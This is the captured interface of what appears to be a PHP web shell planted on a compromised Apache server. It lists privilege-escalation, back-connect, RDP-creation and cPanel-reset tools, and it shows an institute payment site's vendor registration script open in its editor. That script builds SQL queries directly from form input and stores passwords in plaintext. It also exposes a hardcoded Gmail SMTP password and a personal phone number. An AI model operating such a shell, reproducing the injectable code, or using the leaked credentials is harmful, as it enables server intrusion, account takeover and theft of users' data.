Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees /
vendor /
[ HOME SHELL ]
Name
Size
Permission
Action
VRegister.php
5.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VRegister.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script language="javascript" src="calendar.js"></script> <link href="calendar.css" rel="stylesheet" type="text/css" /> <title>IIIT Delhi</title> </head> <body> <?PHP //include the main validation script require_once "formvalidator.php"; $show_form=true; if(isset($_POST['Submit'])) {// The form is submitted //Setup Validations $validator = new FormValidator(); $validator->addValidation("Name","req","Field is required"); $validator->addValidation("Password","req","Field is required"); $validator->addValidation("MobileNo","req","Field is required"); $validator->addValidation("Email","email","The input for Email should be a valid email value"); $validator->addValidation("Email","req","Field is required"); //Now, validate the form if($validator->ValidateForm()) { //Validation success. //Here we can proceed with processing the form //(like sending email, saving to Database etc) // In this example, we just display a message include "database.php"; $select = "Select * from user where Email='$_POST[Email]'"; echo $select; $result = mysql_query($select,$db_connection); if($row=mysql_fetch_array($result)) { echo $row['Name']." had already registered with id: ".$row['Email']."<br><br> If you forget your password <a href='http://womencarrally.com/Pink/forget.html'>Click Here </a>to retrive it !"; }else { require("PHPMailer/class.phpmailer.php"); $sql ="INSERT INTO user(Name,Email,Password,Mobile,Verified) VALUES ('$_POST[Name]','$_POST[Email]','$_POST[Password]','$_POST[MobileNo]',0)"; echo $sql; if (!mysql_query($sql,$db_connection)) { die('Error: ' . mysql_error()); echo "error"; } else { $UserId= mysql_insert_id($db_connection); $mail = new PHPMailer(); $mail->IsSMTP(); // send via SMTP //IsSMTP(); // send via SMTP $mail->SMTPAuth = true; // turn on SMTP authentication $mail->Username = "karan4official@gmail.com"; // SMTP username $mail->Password = "kqrqn.g1984"; // SMTP password $webmaster_email = "karan4official@gmail.com"; //Reply to this email ID $email=$_POST[Email]; // Recipients email ID $name=$_POST[Name]; // Recipients name $mail->From = $webmaster_email; $mail->FromName = "IIIT Delhi"; $mail->AddAddress($email,$name); $mail->AddReplyTo($webmaster_email,"IIIT Delhi"); $mail->WordWrap = 50; // set word wrap //$mail->AddAttachment("/var/tmp/file.tar.gz"); // attachment //$mail->AddAttachment("/tmp/image.jpg", "new.jpg"); // attachment $mail->IsHTML(true); // send as HTML $mail->Subject = "Welcome to IIIT Delhi - Payment Process"; $mail->Body = "<table width='609' border='0' height='100%' cellpadding='0' cellspacing='0' align='center' style='margin:0; padding-bottom:0'> <tr style='margin:0; padding-bottom:0'> <td colspan='3' style='margin:0; padding-bottom:0'><img src='http://www.iiitd.ac.in/sites/default/files/images/site/new_logo_name.jpg' style='margin:0; padding-bottom:0'/></td> </tr> <tr> <td width='29' bgcolor='#f2f5fc'> </td> <td style='padding:10px 10px 10px 10px'><font face='Verdana, Geneva, sans-serif' size='-1'><br>Dear ".$_POST[Name]."<br/>Your mobile number: ".$_POST[MobileNo]." <br />Please click the link below to confirm your mobile and Email. <br> <a href='http://www.womencarrally.com/Pink/Welcome.php?Id=".$UserId."'>Confirm Registration</a></font><br><br><br> <td bgcolor='#f2f5fc' width='29'> </td> </tr> <tr> <td colspan='3' bgcolor='#f2f5fc'></td> </tr> </table>";//HTML Body $mail->AltBody = "Please click Below link to confirm your user registration: http://www.womencarrally.com/Pink/Welcome.php?Id=".$UserId; //Text Body if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "<h2>Account Registration</h2> <p>Thanks for registering with us <br><br><strong>We've sent an account confermation e-mail to ".$_POST[Email].". Please click the confermation link in this e-mail to activate your new account</strong>.</p> <p>If you don't receive an e-mail from us soon, please check your Junk and Spam folders; depending on your e-mail settings, automated e-mails can end up there.</p> <p>If you still haven't received the confirmation after 24 hours, please contact us at <a href='mailto:karan4official@gmail.com'>karan4official@gmail.com</a> or by call at 9718011080 (hours M-F 10:00 AM to 5:00 PM IST).</p>"; } }} $show_form=false; } else { echo "<B>Errors:</B>"; $error_hash = $validator->GetErrors(); foreach($error_hash as $inpname => $inp_err) { echo "<p>$inpname : $inp_err</p>\n"; } }//else }//if(isset($_POST['Submit'])) if(true == $show_form) {?> <FORM name='form' action='' method='post' encType= 'multipart/form-data'> <table width="319" border="0" align="center"> <TBODY> <tr> <th colspan="2" scope="col">Vendor Registration Form </th> </tr> <tr> <td width="99">Full name</td> <td width="210"><input type="text" name="Name" /></td> </tr> <tr> <td>Email</td> <td><input type="text" name="Email"/></td> </tr> <tr> <td>Password</td> <td><input type="password" name="Password"></td> </tr> <tr> <td>Mobile Number</td> <td>+91<input type="text" name="MobileNo" maxlength="10" size="16"></td> </tr> <tr> <td> </td> <td><input type="submit" name="Submit" value="Submit" /> <input name="Reset" type="reset" value="Reset" /></td> </tr> </TBODY> </table> </form><?PHP }//true == $show_form ?> </body> </html>
Close